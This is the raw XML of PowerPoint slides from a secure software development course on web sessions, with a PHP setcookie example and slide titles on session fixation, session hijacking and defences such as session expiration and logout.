                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   …</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;/form&gt;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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1127702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Cookie</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>php</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   $value = 'domain=www.xyz.com';</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>setcookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> ("cookie1", $value, time()+3600)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>;//1 hour</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>?&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                        <a:ea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 name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1085418"/>
            <a:ext cx="7664727" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A generated session id at the server side can be passed to the client side using </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>three common ways (this exclude HTTP header-based approach shown earlier)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3695813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1894BED-CAD2-4AFA-BB12-1DA6AD697177}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B0305F30-8722-411C-9059-0DB9E34F1FB7}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8E764B69-C908-4767-89CE-A2425746F9C7}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <TotalTime>332</TotalTime>
  <Words>2437</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>230</Paragraphs>
  <Slides>27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IT4863</vt:lpstr>
      <vt:lpstr>Web application communication mechanism</vt:lpstr>
      <vt:lpstr>An overview of session in web application</vt:lpstr>
      <vt:lpstr>What is a web session?</vt:lpstr>
      <vt:lpstr>Web session establishment scenarios</vt:lpstr>
      <vt:lpstr>Example of session establishment with cookie</vt:lpstr>
      <vt:lpstr>Example of session establishment at server side</vt:lpstr>
      <vt:lpstr>Checking the validity of cookie sent from the client side</vt:lpstr>
      <vt:lpstr>Session ID transfer from server side to client side</vt:lpstr>
      <vt:lpstr>Threats on established web session</vt:lpstr>
      <vt:lpstr>Some example attacks on web session</vt:lpstr>
      <vt:lpstr>Session fixation</vt:lpstr>
      <vt:lpstr>Session fixation</vt:lpstr>
      <vt:lpstr>Session stealing (hijacking)</vt:lpstr>
      <vt:lpstr>Session stealing (hijacking)</vt:lpstr>
      <vt:lpstr>Session stealing (hijacking) at the client side</vt:lpstr>
      <vt:lpstr>Defense Technique: one time url</vt:lpstr>
      <vt:lpstr>Defense Technique: Subdomain Switching</vt:lpstr>
      <vt:lpstr>Defense technique: Avoid fingerprinting</vt:lpstr>
      <vt:lpstr>Defense technique: Session id length</vt:lpstr>
      <vt:lpstr>Defense technique: Longer Session id entropy</vt:lpstr>
      <vt:lpstr>Defense technique: Meaningless session id content</vt:lpstr>
      <vt:lpstr>Defense technique: Built-in session management</vt:lpstr>
      <vt:lpstr>Defense technique: Session Expiration</vt:lpstr>
      <vt:lpstr>Defense technique: Logout button and content caching</vt:lpstr>
      <vt:lpstr>Defense technique: Logging Sessions Life Cycle</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CS4550: Secure Software Development</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-30T23:20:52Z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